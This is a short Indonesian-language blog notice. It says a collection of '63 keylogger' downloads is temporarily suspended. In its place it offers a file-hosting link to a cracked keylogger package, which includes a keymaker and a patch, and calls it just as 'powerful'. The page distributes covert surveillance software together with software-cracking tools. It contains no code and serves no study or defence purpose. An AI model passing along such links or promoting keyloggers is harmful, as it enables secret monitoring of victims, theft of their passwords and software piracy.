Mohon maaf, sementara link 63 keylogger di suspend terlebih dahulu, sampai kami upload ulang semua keyloggernya ke server local, sebagai gantinya silahkan mencoba keylogger yang tidak kalah powerfullhttp://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html

 
Design by Andalas.net Jombang | Bloggerized by Pröfęsör Muåmår Abdûh